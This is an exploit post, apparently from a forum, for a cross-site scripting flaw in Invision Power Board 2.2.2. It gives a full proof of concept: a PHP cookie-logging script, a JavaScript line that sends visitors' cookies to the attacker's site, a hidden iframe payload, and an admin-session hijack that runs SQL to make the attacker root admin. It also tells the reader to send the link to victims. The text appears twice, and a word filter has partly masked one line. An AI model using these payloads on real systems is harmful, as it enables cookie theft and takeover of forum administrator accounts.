Kod:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# Invision Power Board 2.2.2 Cross Site Scripting vulnerability
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Vendor site: https://tik.lat/vZKra
# Vulnerability found by Iron (ironwarez.info)
#
# Greets to all RootShell Security Group members
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# The vulnerability:
# Open up any php file in /jscripts/folder_rte_files
# See:
var editor_id = <?php print '"'.trim($_REQUEST['editorid']).'";'; ?>
#
# $_REQUEST['editorid'] isn't sanitized in any way, so allows
# other uses to execute their own code.
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# PoC (Log cookies & run SQL query)
#
# Requirements: server supporting PHP, user account on
# target forum, database prefix needs to be known.
#
# Create a file called name.php on your webserver and put this code in it:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
<?php
$target = "http://www.yourtarget.com/forum"; #Target forum without trailing slash
$prefix = "ibf_"; #Database prefix, default: ibf_
$member = 22; #Member id to promote
$newgroup = 4; # The id of the new group to promote, normally 4 is root admin
$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$data = $_GET['c'];
$time = date("Y-m-d G:i:s A");
$text = "Time: ".$time."\nIP:".$ip."\nReferer:".$referer."\nUser-Agent:".$agent."\nCookie:".$data."\n\n";
$file = fopen('log.txt' , 'a');
fwrite($file,$text);
fclose($file);
if(preg_match("/ipb_admin_session_id=([0-9a-z]{32});/",$data,$stuff))
{
print '<img width=0 height=0 src="'.$target.'/admin/index.php?adsess='.$stuff[1].'&act=sql&code=runsql§ion=admin&query=UPDATE+'.$prefix.'members+SET+mgroup+%3D+%27'.$newgroup.'%27+WHERE+id+%3D+%27'.$member.'%27&st="></>';
}
?>
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Also create a file in the same directory named "log.txt" and chmod it 777
#
# Now, create a file called script.js on your webserver, put this code in it:
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
********.*Yasak Kelime**Yasak Kelime**Yasak Kelime**Yasak Kelime**Yasak Kelime**Yasak Kelime**Yasak Kelime**Yasak Kelime*="http://www.yourownsite.com/path/to/file/name.php?c="+********.cookie;
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# And, last but not least, create a file that combines those two
# Name it blah.html and put this code in it:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
<iframe border=0 src="http://www.targetforum.com/forum_folder/jscripts/folder_rte_files/module_table.php?editorid=//--></script><script src=http://www.yourownsite.com/path/to/file/script.js>" width=0 height=0></iframe>
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Now, post a message on the forum or send a pm to your target with the link to the html page.
# If a normal user views the page, his cookies
# will be logged, funny. If an admin visits the page and he has an admin_session_id cookie set,
# he will add you to the root admin group without even knowing .
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# Invision Power Board 2.2.2 Cross Site Scripting vulnerability
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Vendor site: https://tik.lat/vZKra
# Vulnerability found by Iron (ironwarez.info)
#
# Greets to all RootShell Security Group members
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# The vulnerability:
# Open up any php file in /jscripts/folder_rte_files
# See:
var editor_id = <?php print '"'.trim($_REQUEST['editorid']).'";'; ?>
#
# $_REQUEST['editorid'] isn't sanitized in any way, so allows
# other uses to execute their own code.
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# PoC (Log cookies & run SQL query)
#
# Requirements: server supporting PHP, user account on
# target forum, database prefix needs to be known.
#
# Create a file called name.php on your webserver and put this code in it:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
<?php
$target = "http://www.yourtarget.com/forum"; #Target forum without trailing slash
$prefix = "ibf_"; #Database prefix, default: ibf_
$member = 22; #Member id to promote
$newgroup = 4; # The id of the new group to promote, normally 4 is root admin
$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$data = $_GET['c'];
$time = date("Y-m-d G:i:s A");
$text = "Time: ".$time."\nIP:".$ip."\nReferer:".$referer."\nUser-Agent:".$agent."\nCookie:".$data."\n\n";
$file = fopen('log.txt' , 'a');
fwrite($file,$text);
fclose($file);
if(preg_match("/ipb_admin_session_id=([0-9a-z]{32});/",$data,$stuff))
{
print '<img width=0 height=0 src="'.$target.'/admin/index.php?adsess='.$stuff[1].'&act=sql&code=runsql§ion=admin&query=UPDATE+'.$prefix.'members+SET+mgroup+%3D+%27'.$newgroup.'%27+WHERE+id+%3D+%27'.$member.'%27&st="></>';
}
?>
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Also create a file in the same directory named "log.txt" and chmod it 777
#
# Now, create a file called script.js on your webserver, put this code in it:
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
********.*Yasak Kelime**Yasak Kelime**Yasak Kelime**Yasak Kelime**Yasak Kelime**Yasak Kelime**Yasak Kelime**Yasak Kelime*="http://www.yourownsite.com/path/to/file/name.php?c="+********.cookie;
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# And, last but not least, create a file that combines those two
# Name it blah.html and put this code in it:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
<iframe border=0 src="http://www.targetforum.com/forum_folder/jscripts/folder_rte_files/module_table.php?editorid=//--></script><script src=http://www.yourownsite.com/path/to/file/script.js>" width=0 height=0></iframe>
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Now, post a message on the forum or send a pm to your target with the link to the html page.
# If a normal user views the page, his cookies
# will be logged, funny. If an admin visits the page and he has an admin_session_id cookie set,
# he will add you to the root admin group without even knowing .